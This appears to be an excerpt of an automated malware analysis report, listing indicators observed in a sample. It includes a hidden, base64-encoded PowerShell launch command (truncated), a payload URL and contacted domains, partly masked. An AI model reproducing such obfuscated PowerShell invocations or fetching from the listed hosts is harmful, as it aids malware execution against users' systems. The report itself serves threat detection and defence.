Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABLAHQAawB2AHoAdQB2AGcAYQBvAD0AJwBOAGIAagBmAHAAeQB4AHUAYgAnADsAJABPAHYAdABiAHUAZAB5AGcAcQBuACAAPQAgACcANQA5ADkAJwA7ACQASgB6AHoAagB2AGcAbwBnAG0AcQB1AD0AJwBBAHc...
- 'me###ymusk.com':443
- http://di#####ryinspectors.com/wiajfh56jfs/iKgWHum/
- DNS ASK bt###echvn.com
- DNS ASK re##5.com
- DNS ASK di#####ryinspectors.com
- DNS ASK re#####atetiming.net
- DNS ASK me###ymusk.com